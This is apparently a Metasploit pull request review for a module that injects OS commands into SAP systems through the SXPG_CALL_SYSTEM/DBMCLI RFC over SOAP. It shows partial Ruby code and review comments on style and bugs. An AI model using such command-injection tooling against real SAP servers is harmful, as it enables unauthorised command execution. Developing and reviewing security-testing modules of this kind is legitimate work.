SAP SOAP RFC DBMCLI Command Injection (via SXPG_CALL_SYSTEM) #1030

Merged
merged 7 commits into from Nov 20, 2012

Contributor

nmonkee commented Nov 7, 2012

This module makes use of the SXPG_CALL_SYSTEM Remote Function Call (via SOAP) to execute OS commands via DBMCLI command as configured in SM69. See http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection for more information.

+ OptString.new('PASS', [true, 'Password', nil]),
+ OptString.new('CMD', [true, 'Command to be executed', nil]),
+ OptString.new('PARAM', [false, 'Additional parameters', nil]),
+ OptString.new('OS', [true, '1. ANYOS, 2. UNIX, 3. Windows NT, 4. AS/400, 5. OS/400', nil]),
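Review bot: the OS option is an OptString whose description enumerates five numbered choices, so any string is accepted at `set` time and the number-to-name mapping has to be validated by hand inside the module. Declaring it as `OptEnum.new('OS', [true, 'Target OS', 'ANYOS', ['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']])` rejects bad values before `run` and removes the magic numbers from the description. The trailing comma after the last option in the array should also go.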
@brandonprry

brandonprry Nov 11, 2012

Contributor

Trailing comma

@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

If OS commands can be executed maybe it can be converted into an exploit

@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

I think you should use OptEnum for the OS option

+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',
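Review bot: `datastore['CLIENT']` is concatenated straight into the Cookie header with no validation. The SAP client is a three-digit number, so a check such as `unless datastore['CLIENT'] =~ /^\d{3}$/` before the request is built avoids sending a malformed header and gives the user a clear error. Drop the trailing comma after the Content-Type entry.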
@brandonprry

brandonprry Nov 11, 2012

Contributor

Trailing comma

+ 'Content-Type' => 'text/xml; charset=UTF-8',
+ }
+ }, 45)
+ if (res.code != 500 and res.code != 200)
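Review bot: `res` is dereferenced before it is checked for nil. `send_request_cgi` returns nil when the connection fails or times out, so `res.code` raises NoMethodError rather than reaching any error-handling path. Guard with `if res.nil?` first, or write the whole condition as `unless res and [200, 500].include?(res.code)`, and drop the parentheses around the condition per Ruby style.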
@brandonprry

brandonprry Nov 11, 2012

Contributor

if res.code != 500 and res.code != 200

you are also not checking if res is null before evaluating res.code

+ 'Prefix' => "\n",
+ 'Postfix' => "\n",
+ 'Indent' => 1,
+ 'Columns' =>["Output",]
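Review bot: `'Columns' =>["Output",]` has a stray trailing comma inside the array literal and no space after `=>`; `'Columns' => ["Output"]` matches the spacing of the other Rex::Ui::Text::Table keys in this hunk.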
@brandonprry

brandonprry Nov 11, 2012

Contributor

Trailing comma in array?

+ response = res.body
+ if response =~ /faultstring/
+ error = response.scan(%r{<faultstring>(.*?)</faultstring>}).flatten
+ sucess = false
+ sucess = false
+ end
+ output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+ for i in 0..output.length-1
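Review bot: `sucess = false` is misspelled and written twice. Because of the typo the faultstring branch assigns a different local (`sucess`) from the `success` variable the module tests later with `if success == true`, so a SOAP fault does not suppress the table output; the later `if sucess == false` check only lines up with this assignment by virtue of the same typo. Delete the duplicate line and use one correctly spelled variable throughout. The `for i in 0..output.length-1` loop is better written as `output.each do |msg|` (or `each_with_index` if the index is needed); `for` in Ruby also leaks `i` into the enclosing scope.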
@brandonprry

brandonprry Nov 11, 2012

Contributor

0.upto(output.length-1) do |i|

+ print_error("#{ip}:#{datastore['RPORT']} - Unable to connect")
+ return
+ end
+ if success == true
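Review bot: `if success == true` should be `if success`; comparing a boolean against `true` is redundant in Ruby. The `print_error` above reports "Unable to connect" and returns, which is the right shape, but it only helps if the nil check on `res` actually precedes the first use of `res.code`.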
@brandonprry

brandonprry Nov 11, 2012

Contributor

if success

+ if success == true
+ print(saptbl.to_s)
+ end
+ if sucess == false
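Review bot: `if sucess == false` tests the misspelled variable. Once the assignment in the faultstring branch is corrected, this becomes `unless success`; and since the two branches test the same variable back to back, `if success ... else ... end` reads more simply than an `if` followed by a negated `if`.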
@brandonprry

brandonprry Nov 11, 2012

Contributor

typo

also, if not success

or

if !success

+ print(saptbl.to_s)
+ end
+ if sucess == false
+ for i in 0..error.length-1
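Review bot: `for i in 0..error.length-1` indexes an array only to read each element; `error.each { |e| print_error("#{ip}:#{datastore['RPORT']} - #{e}") }` is idiomatic and does not leak the loop variable into the method scope as `for` does.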
@brandonprry

brandonprry Nov 11, 2012

Contributor

0.upto(error.length-1) do |i|

Contributor

jvazquez-r7 commented Nov 14, 2012

msftidy warning should be fixed

$ tools/msftidy.rb modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb 
sap_soap_rfc_sxpg_command_exec.rb:9 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:10 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:12 - [ERROR] Unicode detected: "# Mariano Nu\xC3\xB1ez (the author of the Bizploit framework) helped me in my efforts\n"
sap_soap_rfc_sxpg_command_exec.rb:14 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:15 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:48 - [WARNING] Spaces at EOL
sap_soap_rfc_sxpg_command_exec.rb:135 - [WARNING] Spaces at EOL
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
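Review bot: this `initialize` describes SXPG_COMMAND_EXECUTE while the PR title and description cover SXPG_CALL_SYSTEM via DBMCLI; the later discussion confirms this file belongs to #1037 and was removed from this branch. If a module name of this form is kept anywhere, it should say what the module does, for example 'SAP SOAP RFC SXPG_COMMAND_EXECUTE OS Command Execution', rather than just naming the RFC.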
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

A little more descriptive name pls

+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
+ 'Version' => '$Revision: $0.1',
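Review bot: `'Version' => '$Revision: $0.1'` is a malformed keyword string (the SVN `$Revision$` marker with a literal `0.1` appended) and the Version key is no longer used by the framework; drop the line.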
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

version isn't needed anymore

+ 'Description' => %q{
+ This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
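Review bot: the reference points at the MWR Labs front page rather than the write-up. The PR description already links the specific post (http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection), so use that URL in `'References'`; a bare site link gives a user of the module nothing to read.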
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

no general references pls

+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+ 'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
+ 'License' => BSD_LICENSE
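Review bot: `BSD_LICENSE` differs from the rest of the modules under modules/auxiliary/scanner; unless the authors specifically require BSD terms, `MSF_LICENSE` is the expected value for a module contributed to the framework.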
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

Can MSF_LICENSE be used?

+ 'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE',
+ 'Version' => '$Revision: $0.1',
+ 'Description' => %q{
+ This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call (via SOAP) to execute OS commands as configured in SM69.
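Review bot: the description line exceeds 100 columns; wrap it inside the `%q{ }` block. It would also help users to state the prerequisites the module relies on (valid SAP credentials and an external command configured in SM69) rather than only restating the RFC name.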
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

No more than 100 columns per line in the description pls

+ # to do - implement error handlers for each status code, 404, 301, etc.
+ print_error("#{ip}:#{datastore['RPORT']} - something went wrong!")
+ return
+ else
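Review bot: the `# to do` comment about per-status-code handlers can be resolved now rather than deferred: `res.code` is already known in this branch, so report it in the message, for example `print_error("#{ip}:#{datastore['RPORT']} - unexpected HTTP status #{res.code}")`, instead of the generic "something went wrong!". This branch also assumes `res` is non-nil, which needs to be guaranteed by a check before `res.code` is first read.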
@jvazquez-r7

jvazquez-r7 Nov 14, 2012

Contributor

sure res couldn't be nil here?

Contributor

jvazquez-r7 commented Nov 18, 2012

This pull request includes the file modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb, isn't it the same as #1037?

Contributor

jvazquez-r7 commented Nov 18, 2012

ap haha sorry, can you just delete it (the wrong file) from this branch (sap_soap_rfc_dbmcli_sxpg_call_system_command_exec)?

Contributor

nmonkee commented Nov 18, 2012

done

jvazquez-r7 and others added some commits Nov 19, 2012

@jvazquez-r7 jvazquez-r7 referenced this pull request in nmonkee/metasploit-framework Nov 20, 2012

Merged

up to date to test rapid7#1030 #3

Contributor

jvazquez-r7 commented Nov 20, 2012

Awesome! Looks good, merging! Thanks for updating the author, sorry, my fault!

@jvazquez-r7 jvazquez-r7 merged commit e16a51f into rapid7:master Nov 20, 2012

1 check passed

default The Travis build passed